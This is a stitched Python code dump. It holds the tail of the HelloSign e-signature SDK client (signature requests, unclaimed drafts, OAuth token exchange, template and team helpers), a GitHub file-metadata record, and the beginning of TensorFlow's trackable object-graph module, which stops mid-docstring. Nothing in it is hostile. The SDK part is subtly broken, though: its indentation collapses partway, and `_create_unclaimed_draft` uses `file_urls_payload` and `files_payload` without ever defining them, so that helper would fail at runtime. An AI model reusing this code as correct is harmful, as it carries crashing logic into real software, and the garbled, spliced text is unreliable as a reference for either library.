'requester_email_address': requester_email_address,
'is_for_embedded_signing': is_for_embedded_signing,
'files': files,
'file_urls': file_urls,
'draft_type': draft_type,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'requesting_redirect_url': requesting_redirect_url,
'signers': signers,
'custom_fields': custom_fields,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'metadata': metadata,
'use_preexisting_fields': use_preexisting_fields,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'skip_me_now': skip_me_now,
'signing_options': signing_options,
'allow_reassign': allow_reassign,
'allow_decline': allow_decline,
'allow_ccs': allow_ccs,
'attachments': attachments
}
return self._create_unclaimed_draft(**params)
def create_embedded_unclaimed_draft_with_template(self, test_mode=False,
client_id=None, is_for_embedded_signing=False, template_id=None,
template_ids=None, requester_email_address=None, title=None,
subject=None, message=None, signers=None, ccs=None, signing_redirect_url=None,
requesting_redirect_url=None, metadata=None, custom_fields=None,
files=None, file_urls=None, skip_me_now=False, allow_decline=False,
allow_reassign=False, signing_options=None):
''' Creates a new Draft to be used for embedded requesting
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this draft. Visit our embedded page to learn more about this parameter.
template_id (str): The id of the Template to use when creating the Unclaimed Draft. Mutually exclusive with template_ids.
template_ids (list of str): The ids of the Templates to use when creating the Unclaimed Draft. Mutually exclusive with template_id.
requester_email_address (str): The email address of the user that should be designated as the requester of this draft, if the draft type is "request_signature."
title (str, optional): The title you want to assign to the Unclaimed Draft
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
ccs (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
is_for_embedded_signing (bool, optional): The request created from this draft will also be signable in embedded mode if set to True. The default is False.
metadata (dict, optional): Metadata to associate with the draft. Each request can include up to 10 metadata keys, with key names up to 40 characters long and values up to 500 characters long.
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template. An item of the list should look like this: `{'name: value'}`
files (list of str): The uploaded file(s) to append to the Signature Request.
file_urls (list of str): URLs of the file for HelloSign to download to append to the Signature Request. Use either `files` or `file_urls`
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
"client_id": client_id,
"requester_email_address": requester_email_address
}, [{
"template_id": template_id,
"template_ids": template_ids
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'is_for_embedded_signing': is_for_embedded_signing,
'template_id': template_id,
'template_ids': template_ids,
'title': title,
'subject': subject,
'message': message,
'requester_email_address': requester_email_address,
'signing_redirect_url': signing_redirect_url,
'requesting_redirect_url': requesting_redirect_url,
'signers': signers,
'ccs': ccs,
'metadata': metadata,
'custom_fields': custom_fields,
'files': files,
'file_urls': file_urls,
'skip_me_now': skip_me_now,
'allow_decline': allow_decline,
'allow_reassign': allow_reassign,
'signing_options': signing_options
}
return self._create_embedded_unclaimed_draft_with_template(**params)
@api_resource(UnclaimedDraft)
def unclaimed_draft_edit_and_resend(self, signature_request_id, client_id,
test_mode=False, requesting_redirect_url=None, signing_redirect_url=None,
is_for_embedded_signing=False, requester_email_address=None):
''' Updates a new signature request from an embedded request that can be edited prior to being sent.
Args:
signature_request_id (str): The id of the SignatureRequest to edit and resend
client_id (str): Client id of the app you're using to create this draft.
test_mode (bool, optional): Whether this is a test, the signature request created from this
draft will not be legally binding if set to True. Defaults to False.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
is_for_embedded_signing (bool, optional): The request created from this draft will also be signable in
embedded mode if set to True. The default is False.
requester_email_address (str, optional): The email address of the user that should be designated as the
requester of this draft, if the draft type is "request_signature."
Returns:
A UnclaimedDraft object
'''
self._check_required_fields({
"client_id": client_id
}
)
data = {
'client_id': client_id,
'test_mode': self._boolean(test_mode),
'requesting_redirect_url': requesting_redirect_url,
'signing_redirect_url': signing_redirect_url,
'is_for_embedded_signing': self._boolean(is_for_embedded_signing),
'requester_email_address': requester_email_address
}
data = HSFormat.strip_none_values(data)
request = self._get_request()
return request.post(self.UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL + signature_request_id, data=data)
# ---- OAUTH METHODS -------------------------------
def get_oauth_data(self, code, client_id, client_secret, state):
''' Get Oauth data from HelloSign
Args:
code (str): Code returned by HelloSign for our callback url
client_id (str): Client id of the associated app
client_secret (str): Secret token of the associated app
Returns:
A HSAccessTokenAuth object
'''
request = self._get_request()
response = request.post(self.OAUTH_TOKEN_URL, {
"state": state,
"code": code,
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret
})
return HSAccessTokenAuth.from_response(response)
def refresh_access_token(self, refresh_token):
''' Refreshes the current access token.
Gets a new access token, updates client auth and returns it.
Args:
refresh_token (str): Refresh token to use
Returns:
The new access token
'''
request = self._get_request()
response = request.post(self.OAUTH_TOKEN_URL, {
"grant_type": "refresh_token",
"refresh_token": refresh_token
})
self.auth = HSAccessTokenAuth.from_response(response)
return self.auth.access_token
# ---- HELPERS -------------------------------------
def get_last_warnings(self):
''' Return the warnings associated with the last request '''
if self.request:
return self.request.get_warnings()
def _boolean(self, v):
''' Convert a value to a boolean '''
return '1' if (v in (True, 'true', 'True', '1', 1)) else '0'
def _get_request(self, auth=None):
''' Return an http request object
auth: Auth data to use
Returns:
A HSRequest object
'''
self.request = HSRequest(auth or self.auth, self.env)
self.request.response_callback = self.response_callback
return self.request
def _authenticate(self, email_address=None, password=None, api_key=None,
access_token=None, access_token_type=None):
''' Create authentication object to send requests
Args:
email_address (str): Email address of the account to make the requests
password (str): Password of the account used with email address
api_key (str): API Key. You can find your API key in https://app.hellosign.com/home/myAccount/current_tab/integrations#api
access_token (str): OAuth access token
access_token_type (str): Type of OAuth access token
Raises:
NoAuthMethod: If no authentication information found
Returns:
A HTTPBasicAuth or HSAccessTokenAuth object
'''
if access_token_type and access_token:
return HSAccessTokenAuth(access_token, access_token_type)
elif api_key:
return HTTPBasicAuth(api_key, '')
elif email_address and password:
return HTTPBasicAuth(email_address, password)
else:
raise NoAuthMethod("No authentication information found!")
def _check_required_fields(self, fields=None, either_fields=None):
''' Check the values of the fields
If no value found in `fields`, an exception will be raised.
`either_fields` are the fields that one of them must have a value
Raises:
HSException: If no value found in at least one item of`fields`, or
no value found in one of the items of `either_fields`
Returns:
None
'''
for (key, value) in fields.items():
# If value is a dict, one of the fields in the dict is required ->
# exception if all are None
if not value:
raise HSException("Field '%s' is required." % key)
if either_fields is not None:
for field in either_fields:
if not any(field.values()):
raise HSException("One of the following fields is required: %s" % ", ".join(field.keys()))
@api_resource(SignatureRequest)
def _send_signature_request(self, test_mode=False, client_id=None, files=None,
        file_urls=None, title=None, subject=None, message=None,
        signing_redirect_url=None, signers=None, custom_fields=None,
        cc_email_addresses=None, form_fields_per_document=None, use_text_tags=False,
        hide_text_tags=False, metadata=None, allow_decline=False, allow_reassign=False,
        signing_options=None, is_for_embedded_signing=False, attachments=None):
    ''' Shared logic for send_signature_request and
    send_signature_request_embedded

    Args:
        test_mode (bool, optional): When True the request is not legally binding
        client_id (str): Client id of the app used for embedded requests
        files (list of str): Uploaded file(s) to send for signature
        file_urls (list of str): URLs for HelloSign to download; use either `files` or `file_urls`
        title (str, optional): Title for the SignatureRequest
        subject (str, optional): Subject of the signer email
        message (str, optional): Custom message in the signer email
        signing_redirect_url (str, optional): URL the signer is redirected to after signing
        signers (list of dict): Signers with keys: name, email_address,
            order (optional), pin (optional)
        custom_fields (list of dict, optional): Custom field values; required when the template declares CustomFields
        cc_email_addresses (list, optional): Email addresses to CC
        form_fields_per_document (str or list of dict, optional): Fields to place
            on the document; either pre-serialized JSON or a structure to serialize
        use_text_tags (bool, optional): Create form fields from text tags in the file(s)
        hide_text_tags (bool, optional): Hide text tag areas
        metadata (dict, optional): Metadata to attach to the signature request
        allow_decline (bool, optional): Let signers decline to sign
        allow_reassign (bool, optional): Let signers reassign their request
        signing_options (dict, optional): Allowed signature creation types
        is_for_embedded_signing (bool): Route the call to the embedded endpoint
        attachments (list of dict): Attachments with keys: name, instructions,
            signer_index, required (optional)

    Returns:
        A SignatureRequest object
    '''
    # form_fields_per_document may already be serialized JSON.
    if isinstance(form_fields_per_document, str):
        form_fields_payload = form_fields_per_document
    else:
        form_fields_payload = HSFormat.format_json_data(form_fields_per_document)

    # Scalar parameters; None entries are dropped before sending.
    data = HSFormat.strip_none_values({
        "test_mode": self._boolean(test_mode),
        "client_id": client_id,
        "title": title,
        "subject": subject,
        "message": message,
        "signing_redirect_url": signing_redirect_url,
        "form_fields_per_document": form_fields_payload,
        "use_text_tags": self._boolean(use_text_tags),
        "hide_text_tags": self._boolean(hide_text_tags),
        "allow_decline": self._boolean(allow_decline),
        "allow_reassign": self._boolean(allow_reassign),
        "signing_options": HSFormat.format_json_data(signing_options)
    })

    # Multi-value parameter groups, merged in this order so later groups
    # take precedence on key collisions (matches the API expectations).
    for group in (
            HSFormat.format_dict_list(signers, 'signers'),
            HSFormat.format_custom_fields(custom_fields),
            HSFormat.format_param_list(cc_email_addresses, 'cc_email_addresses'),
            HSFormat.format_file_url_params(file_urls),
            HSFormat.format_single_dict(metadata, 'metadata'),
            HSFormat.format_signing_options(signing_options, 'signing_options'),
            HSFormat.format_dict_list(attachments, 'attachments')):
        data.update(group)

    if is_for_embedded_signing:
        endpoint = self.SIGNATURE_REQUEST_CREATE_EMBEDDED_URL
    else:
        endpoint = self.SIGNATURE_REQUEST_CREATE_URL

    request = self._get_request()
    return request.post(endpoint, data=data,
                        files=HSFormat.format_file_params(files))
@api_resource(SignatureRequest)
def _send_signature_request_with_template(self, test_mode=False, client_id=None,
        template_id=None, template_ids=None, title=None, subject=None, message=None,
        signing_redirect_url=None, signers=None, ccs=None, custom_fields=None,
        metadata=None, allow_decline=False, files=None, file_urls=None, signing_options=None):
    ''' Shared logic for send_signature_request_with_template and
    send_signature_request_embedded_with_template

    Args:
        test_mode (bool, optional): When True the request is not legally binding
        client_id (str): Client id of the app used for embedded requests
        template_id (str): Template id; mutually exclusive with template_ids
        template_ids (list): Template ids; mutually exclusive with template_id
        title (str, optional): Title for the SignatureRequest
        subject (str, optional): Subject of the signer email
        message (str, optional): Custom message in the signer email
        signing_redirect_url (str, optional): URL the signer is redirected to after signing
        signers (list of dict): Signers with keys: role_name, name,
            email_address, pin (optional)
        ccs (list of dict, optional): CC entries with keys: role_name,
            email_address; required when the Template declares CC roles
        custom_fields (list of dict, optional): Custom field values, each
            shaped like `{'name: value'}`
        metadata (dict, optional): Metadata to attach to the signature request
        allow_decline (bool, optional): Let signers decline to sign
        files (list of str): Uploaded file(s) to append to the request
        file_urls (list of str): URLs for HelloSign to download; use either `files` or `file_urls`
        signing_options (dict, optional): Allowed signature creation types

    Returns:
        A SignatureRequest object
    '''
    # Indexed template_ids[i] parameters.
    template_ids_payload = {}
    if template_ids:
        for index, one_id in enumerate(template_ids):
            template_ids_payload["template_ids[%s]" % index] = one_id

    # Scalar parameters; None entries are dropped before sending.
    data = HSFormat.strip_none_values({
        "test_mode": self._boolean(test_mode),
        "client_id": client_id,
        "template_id": template_id,
        "title": title,
        "subject": subject,
        "message": message,
        "signing_redirect_url": signing_redirect_url,
        "allow_decline": self._boolean(allow_decline),
        "signing_options": HSFormat.format_json_data(signing_options)
    })

    # Multi-value groups merged in the same order as the sibling helpers.
    for group in (
            HSFormat.format_dict_list(signers, 'signers', 'role_name'),
            HSFormat.format_dict_list(ccs, 'ccs', 'role_name'),
            HSFormat.format_custom_fields(custom_fields),
            HSFormat.format_single_dict(metadata, 'metadata'),
            HSFormat.format_signing_options(signing_options, 'signing_options'),
            template_ids_payload,
            HSFormat.format_file_url_params(file_urls)):
        data.update(group)

    # A client id switches the call to the embedded endpoint.
    if client_id:
        endpoint = self.SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL
    else:
        endpoint = self.SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL

    request = self._get_request()
    return request.post(endpoint, data=data,
                        files=HSFormat.format_file_params(files))
@api_resource(UnclaimedDraft)
def _create_unclaimed_draft(self, test_mode=False, client_id=None,
        is_for_embedded_signing=False, requester_email_address=None, files=None,
        file_urls=None, draft_type=None, subject=None, message=None, signers=None,
        custom_fields=None, cc_email_addresses=None, signing_redirect_url=None,
        requesting_redirect_url=None, form_fields_per_document=None, metadata=None,
        use_preexisting_fields=False, use_text_tags=False, hide_text_tags=False,
        skip_me_now=False, allow_reassign=False, allow_decline=False,
        signing_options=None, allow_ccs=False, attachments=None):
    ''' Creates a new Draft that can be claimed using the claim URL

    Args:
        test_mode (bool, optional): When True the resulting request is not legally binding
        client_id (str): Client id of the app used to create the embedded draft
        is_for_embedded_signing (bool): Whether this is also for embedded signing
        requester_email_address (str): Requester email for embedded requesting
        files (list of str): Uploaded file(s) to send for signature
        file_urls (list of str): URLs for HelloSign to download; use either `files` or `file_urls`
        draft_type (str): "send_document" for a claimable file or
            "request_signature" for a claimable signature request; the latter
            requires each signer's name and email_address
        subject (str, optional): Subject of the signer email
        message (str, optional): Custom message in the signer email
        signers (list of dict): Signers with keys: name, email_address, order (optional)
        custom_fields (list of dict, optional): Custom field values, each
            shaped like `{'name: value'}`
        cc_email_addresses (list of str, optional): Email addresses to CC
        signing_redirect_url (str, optional): URL the signer is redirected to after signing
        requesting_redirect_url (str, optional): URL the requester is redirected to after sending
        form_fields_per_document (str or list of dict, optional): Fields to place
            on the document; either pre-serialized JSON or a structure to serialize
        metadata (dict, optional): Metadata to attach to the draft
        use_preexisting_fields (bool): Whether to use preexisting PDF fields
        use_text_tags (bool, optional): Create form fields from text tags in the file(s)
        hide_text_tags (bool, optional): Hide text tag areas
        skip_me_now (bool, optional): Disable the "Me (Now)" option for the preparer
        allow_reassign (bool, optional): Let signers reassign their request
        allow_decline (bool, optional): Let signers decline to sign
        signing_options (dict, optional): Allowed signature creation types
        allow_ccs (bool, optional): Let the user provide CC addresses when sending
        attachments (list of dict): Attachments with keys: name, instructions,
            signer_index, required (optional)

    Raises:
        HSException: If a "request_signature" draft has a signer missing a
            name or an email address

    Returns:
        An UnclaimedDraft object
    '''
    # Signer validation: for a claimable signature request BOTH name and
    # email_address are mandatory. The previous check used `and`, so it
    # only fired when both were missing, silently accepting a signer with
    # just one of the two.
    signers_payload = {}
    if signers:
        if draft_type == UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE:
            for signer in signers:
                if "name" not in signer or "email_address" not in signer:
                    raise HSException("Signer's name and email are required")
        # Formatting hoisted out of the loop; the old code redundantly
        # re-formatted the full list once per signer.
        signers_payload = HSFormat.format_dict_list(signers, 'signers')
    # CCs
    cc_email_addresses_payload = HSFormat.format_param_list(cc_email_addresses, 'cc_email_addresses')
    # Custom fields
    custom_fields_payload = HSFormat.format_custom_fields(custom_fields)
    # Form fields per document: may already be serialized JSON.
    if isinstance(form_fields_per_document, str):
        form_fields_payload = form_fields_per_document
    else:
        form_fields_payload = HSFormat.format_json_data(form_fields_per_document)
    # Metadata
    metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
    # Signing options
    signing_options_payload = HSFormat.format_signing_options(signing_options, 'signing_options')
    # Attachments
    attachments_payload = HSFormat.format_dict_list(attachments, 'attachments')
    payload = {
        "test_mode": self._boolean(test_mode),
        "type": draft_type,
        "subject": subject,
        "message": message,
        "signing_redirect_url": signing_redirect_url,
        "form_fields_per_document": form_fields_payload,
        "use_preexisting_fields": self._boolean(use_preexisting_fields),
        "use_text_tags": self._boolean(use_text_tags),
        "hide_text_tags": self._boolean(hide_text_tags),
        "skip_me_now": self._boolean(skip_me_now),
        "allow_reassign": self._boolean(allow_reassign),
        "allow_decline": self._boolean(allow_decline),
        "signing_options": HSFormat.format_json_data(signing_options),
        "allow_ccs": self._boolean(allow_ccs)
    }
    url = self.UNCLAIMED_DRAFT_CREATE_URL
    # A client id switches to the embedded endpoint and adds its params.
    if client_id is not None:
        payload.update({
            'client_id': client_id,
            'is_for_embedded_signing': '1' if is_for_embedded_signing else '0',
            'requester_email_address': requester_email_address,
            'requesting_redirect_url': requesting_redirect_url
        })
        url = self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL
    # Remove attributes with None values before sending.
    payload = HSFormat.strip_none_values(payload)
    data = payload.copy()
    data.update(signers_payload)
    data.update(custom_fields_payload)
    data.update(cc_email_addresses_payload)
    data.update(file_urls_payload)
    data.update(metadata_payload)
    data.update(signing_options_payload)
    data.update(attachments_payload)
    request = self._get_request()
    response = request.post(url, data=data, files=files_payload)
    return response
@api_resource(Template)
def _add_remove_user_template(self, url, template_id, account_id=None, email_address=None):
    ''' Add or Remove a user from a Template

    One helper covers both tasks because they share the same API call;
    `url` selects which operation runs.

    Args:
        url (str): Endpoint prefix for the add or remove operation
        template_id (str): The id of the template
        account_id (str): ID of the account to add/remove access to/from
        email_address (str): The email_address of the account to add/remove access to/from

    Raises:
        HSException: If no email address or account_id specified

    Returns:
        A Template object
    '''
    if not account_id and not email_address:
        raise HSException("No email address or account_id specified")
    # account_id takes precedence when both identifiers are supplied.
    if account_id is not None:
        data = {"account_id": account_id}
    else:
        data = {"email_address": email_address}
    request = self._get_request()
    return request.post(url + template_id, data)
@api_resource(Team)
def _add_remove_team_member(self, url, email_address=None, account_id=None):
    ''' Add or Remove a team member

    One helper covers both tasks because they share the same API call;
    `url` selects which operation runs.

    Args:
        url (str): Endpoint for the add or remove operation
        email_address (str): Email address of the Account to add/remove
        account_id (str): ID of the Account to add/remove

    Raises:
        HSException: If no email address or account_id specified

    Returns:
        A Team object
    '''
    if not account_id and not email_address:
        raise HSException("No email address or account_id specified")
    # account_id takes precedence when both identifiers are supplied.
    data = ({"account_id": account_id} if account_id is not None
            else {"email_address": email_address})
    request = self._get_request()
    return request.post(url, data)
@api_resource(Template)
def _create_embedded_template_draft(self, client_id, signer_roles, test_mode=False,
        files=None, file_urls=None, title=None, subject=None, message=None,
        cc_roles=None, merge_fields=None, skip_me_now=False,
        use_preexisting_fields=False, metadata=None, allow_reassign=False, allow_ccs=False, attachments=None):
    ''' Helper method for creating embedded template drafts.
    See public function for params.
    '''
    endpoint = self.TEMPLATE_CREATE_EMBEDDED_DRAFT_URL
    # Scalar parameters.
    data = {
        'test_mode': self._boolean(test_mode),
        'client_id': client_id,
        'title': title,
        'subject': subject,
        'message': message,
        'skip_me_now': self._boolean(skip_me_now),
        'use_preexisting_fields': self._boolean(use_preexisting_fields),
        'allow_reassign': self._boolean(allow_reassign),
        'allow_ccs': self._boolean(allow_ccs)
    }
    # Multi-value groups, merged in the same order as before.
    for group in (
            HSFormat.format_file_url_params(file_urls),
            HSFormat.format_dict_list(signer_roles, 'signer_roles'),
            HSFormat.format_param_list(cc_roles, 'cc_roles'),
            HSFormat.format_single_dict(metadata, 'metadata'),
            HSFormat.format_dict_list(attachments, 'attachments')):
        data.update(group)
    # Merge fields are serialized only when present.
    if merge_fields is not None:
        data.update({'merge_fields': json.dumps(merge_fields)})
    data = HSFormat.strip_none_values(data)
    request = self._get_request()
    return request.post(endpoint, data=data,
                        files=HSFormat.format_file_params(files))
@api_resource(UnclaimedDraft)
def _create_embedded_unclaimed_draft_with_template(self, test_mode=False,
        client_id=None, is_for_embedded_signing=False, template_id=None,
        template_ids=None, requester_email_address=None, title=None,
        subject=None, message=None, signers=None, ccs=None,
        signing_redirect_url=None, requesting_redirect_url=None, metadata=None,
        custom_fields=None, files=None, file_urls=None, skip_me_now=False,
        allow_decline=False, allow_reassign=False, signing_options=None):
    ''' Helper method for creating unclaimed drafts from templates.
    See public function for params.
    '''
    # Scalar parameters.
    data = {
        "test_mode": self._boolean(test_mode),
        "client_id": client_id,
        "is_for_embedded_signing": self._boolean(is_for_embedded_signing),
        "template_id": template_id,
        "requester_email_address": requester_email_address,
        "title": title,
        "subject": subject,
        "message": message,
        "signing_redirect_url": signing_redirect_url,
        "requesting_redirect_url": requesting_redirect_url,
        "skip_me_now": self._boolean(skip_me_now),
        "allow_decline": self._boolean(allow_decline),
        "allow_reassign": self._boolean(allow_reassign),
        "signing_options": HSFormat.format_json_data(signing_options)
    }
    # Multi-value groups, merged in the same order as before.
    for group in (
            HSFormat.format_param_list(template_ids, 'template_ids'),
            HSFormat.format_dict_list(signers, 'signers', 'role_name'),
            HSFormat.format_dict_list(ccs, 'ccs', 'role_name'),
            HSFormat.format_single_dict(metadata, 'metadata'),
            HSFormat.format_signing_options(signing_options, 'signing_options'),
            HSFormat.format_custom_fields(custom_fields),
            HSFormat.format_file_url_params(file_urls)):
        data.update(group)
    data = HSFormat.strip_none_values(data)
    # Send the call.
    endpoint = self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL
    request = self._get_request()
    return request.post(endpoint, data=data,
                        files=HSFormat.format_file_params(files))
| {
"content_hash": "5ab5b846c49f06a0e196601f1dc10383",
"timestamp": "",
"source": "github",
"line_count": 2499,
"max_line_length": 331,
"avg_line_length": 42.43817527010804,
"alnum_prop": 0.6282613410275995,
"repo_name": "HelloFax/hellosign-python-sdk",
"id": "bdcdbcdcf78084c97d3cbdc0beb491fcb0d8b4fe",
"size": "106053",
"binary": false,
"copies": "1",
"ref": "refs/heads/v3",
"path": "hellosign_sdk/hsclient.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "220399"
}
],
"symlink_target": ""
} |
"""Manages a graph of Trackable objects."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import weakref
from tensorflow.core.protobuf import trackable_object_graph_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.training import optimizer as optimizer_v1
from tensorflow.python.training.saving import saveable_object as saveable_object_lib
from tensorflow.python.training.saving import saveable_object_util
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
_ESCAPE_CHAR = "." # For avoiding conflicts with user-specified names.
# Keyword for identifying that the next bit of a checkpoint variable name is a
# slot name. Checkpoint names for slot variables look like:
#
# <path to variable>/<_OPTIMIZER_SLOTS_NAME>/<path to optimizer>/<slot name>
#
# Where <path to variable> is a full path from the checkpoint root to the
# variable being slotted for.
_OPTIMIZER_SLOTS_NAME = _ESCAPE_CHAR + "OPTIMIZER_SLOT"
# Keyword for separating the path to an object from the name of an
# attribute in checkpoint names. Used like:
# <path to variable>/<_OBJECT_ATTRIBUTES_NAME>/<name of attribute>
_OBJECT_ATTRIBUTES_NAME = _ESCAPE_CHAR + "ATTRIBUTES"
def _escape_local_name(name):
# We need to support slashes in local names for compatibility, since this
# naming scheme is being patched in to things like Layer.add_variable where
# slashes were previously accepted. We also want to use slashes to indicate
# edges traversed to reach the variable, so we escape forward slashes in
# names.
return (name.replace(_ESCAPE_CHAR, _ESCAPE_CHAR + _ESCAPE_CHAR)
.replace(r"/", _ESCAPE_CHAR + "S"))
def _object_prefix_from_path(path_to_root):
return "/".join(
(_escape_local_name(trackable.name)
for trackable in path_to_root))
def _slot_variable_naming_for_optimizer(optimizer_path):
  """Make a function for naming slot variables in an optimizer.

  Slot variables are named:

    <variable name>/<_OPTIMIZER_SLOTS_NAME>/<optimizer path>/<slot name>

  where <variable name> is exactly the checkpoint name used for the original
  variable (the path from the checkpoint root plus its local name in the
  owning object). Slot variables are only saved when the variable they slot
  for is also being saved.
  """
  # Pre-compute the constant middle segment once per optimizer.
  infix = "/".join(("", _OPTIMIZER_SLOTS_NAME, optimizer_path, ""))

  def _name_slot_variable(variable_path, slot_name):
    """Name one slot variable for the optimizer captured above."""
    return "".join((variable_path, infix, _escape_local_name(slot_name)))

  return _name_slot_variable
def _serialize_slot_variables(trackable_objects, node_ids, object_names):
  """Gather and name slot variables.

  NOTE(review): mutates its arguments in place — discovered slot variables
  are appended to `trackable_objects` and registered in `node_ids` and
  `object_names`.

  Args:
    trackable_objects: List of trackables in traversal order; extended with
      any slot variables found.
    node_ids: Mapping (by object identity) trackable -> node id.
    object_names: Mapping (by object identity) trackable -> checkpoint name.

  Returns:
    An ObjectIdentityDictionary mapping each optimizer to the list of
    SlotVariableReference protos describing its slot variables.

  Raises:
    NotImplementedError: If a slot variable has its own dependencies, or is
      re-used as a dependency of another Trackable object.
  """
  # Snapshot the list: the loop appends slot variables to trackable_objects,
  # and those must not themselves be scanned for slots.
  non_slot_objects = list(trackable_objects)
  slot_variables = object_identity.ObjectIdentityDictionary()
  for trackable in non_slot_objects:
    if (isinstance(trackable, optimizer_v1.Optimizer)
        # TODO(b/110718070): Fix Keras imports.
        or hasattr(trackable, "_create_or_restore_slot_variable")):
      naming_scheme = _slot_variable_naming_for_optimizer(
          optimizer_path=object_names[trackable])
      slot_names = trackable.get_slot_names()
      for slot_name in slot_names:
        # Check every non-slot object: only variables that are themselves
        # being saved can have their slots saved.
        for original_variable_node_id, original_variable in enumerate(
            non_slot_objects):
          try:
            slot_variable = trackable.get_slot(
                original_variable, slot_name)
          except (AttributeError, KeyError):
            # No slot for this (variable, slot_name) pair.
            slot_variable = None
          if slot_variable is None:
            continue
          slot_variable._maybe_initialize_trackable()  # pylint: disable=protected-access
          if slot_variable._checkpoint_dependencies:  # pylint: disable=protected-access
            # TODO(allenl): Gather dependencies of slot variables.
            raise NotImplementedError(
                "Currently only variables with no dependencies can be saved as "
                "slot variables. File a feature request if this limitation "
                "bothers you.")
          if slot_variable in node_ids:
            raise NotImplementedError(
                "A slot variable was re-used as a dependency of a "
                "Trackable object. This is not currently allowed. File a "
                "feature request if this limitation bothers you.")
          checkpoint_name = naming_scheme(
              variable_path=object_names[original_variable],
              slot_name=slot_name)
          object_names[slot_variable] = checkpoint_name
          # New node ids continue after everything already registered.
          slot_variable_node_id = len(trackable_objects)
          node_ids[slot_variable] = slot_variable_node_id
          trackable_objects.append(slot_variable)
          slot_variable_proto = (
              trackable_object_graph_pb2.TrackableObjectGraph
              .TrackableObject.SlotVariableReference(
                  slot_name=slot_name,
                  original_variable_node_id=original_variable_node_id,
                  slot_variable_node_id=slot_variable_node_id))
          slot_variables.setdefault(trackable, []).append(
              slot_variable_proto)
  return slot_variables
class ObjectGraphView(object):
"""Gathers and serializes an object graph."""
def __init__(self, root, saveables_cache=None):
  """Configure the graph view.

  Args:
    root: A `Trackable` object whose variables (including the variables of
      its dependencies, recursively) should be saved. May be a weak
      reference.
    saveables_cache: Optional dictionary mapping `Trackable` objects ->
      attribute names -> SaveableObjects, used to avoid re-creating
      SaveableObjects when graph building.
  """
  # Stored as given; if it is a weakref it is dereferenced lazily by the
  # `root` property.
  self._root_ref = root
  self._saveables_cache = saveables_cache
def list_dependencies(self, obj):
  """Return `obj`'s checkpoint dependencies, initializing it first."""
  # pylint: disable=protected-access
  obj._maybe_initialize_trackable()
  return obj._checkpoint_dependencies
  # pylint: enable=protected-access
@property
def saveables_cache(self):
  """The Trackable -> attribute name -> list(SaveableObjects) cache.

  Used to avoid re-creating SaveableObjects when graph building.

  Returns:
    The cache (an object-identity dictionary), or None if caching is
    disabled (e.g. when executing eagerly).
  """
  return self._saveables_cache
@property
def root(self):
  """The root trackable, dereferencing the weak reference if one was given."""
  if not isinstance(self._root_ref, weakref.ref):
    return self._root_ref
  referent = self._root_ref()
  # The root must outlive the view; a dead weakref is a programming error.
  assert referent is not None
  return referent
def _breadth_first_traversal(self):
  """Find shortest paths to all dependencies of self.root.

  Returns:
    A pair (visit_order, path_to_root): trackables in breadth-first order,
    and a map from each trackable to the tuple of TrackableReferences
    leading to it from the root.

  Raises:
    NotImplementedError: If a NotTrackable object is reachable.
  """
  visit_order = []
  path_to_root = object_identity.ObjectIdentityDictionary()
  path_to_root[self.root] = ()
  pending = collections.deque([self.root])
  while pending:
    node = pending.popleft()
    if isinstance(node, tracking.NotTrackable):
      raise NotImplementedError(
          ("The object %s does not support object-based saving. File a "
           "feature request if this limitation bothers you. In the meantime, "
           "you can remove the dependency on this object and save everything "
           "else.")
          % (node,))
    visit_order.append(node)
    for name, dependency in self.list_dependencies(node):
      if dependency in path_to_root:
        # Already reached via a path that is at least as short.
        continue
      path_to_root[dependency] = path_to_root[node] + (
          base.TrackableReference(name, dependency),)
      pending.append(dependency)
  return visit_order, path_to_root
def _add_attributes_to_object_graph(
        self, trackable_objects, object_graph_proto, node_ids, object_names,
        object_map):
    """Create SaveableObjects and corresponding SerializedTensor protos.

    Args:
      trackable_objects: Trackables in breadth-first order; must line up
        one-to-one with `object_graph_proto.nodes`.
      object_graph_proto: The proto whose node attributes are filled in.
      node_ids: Maps each trackable to its checkpoint node id.
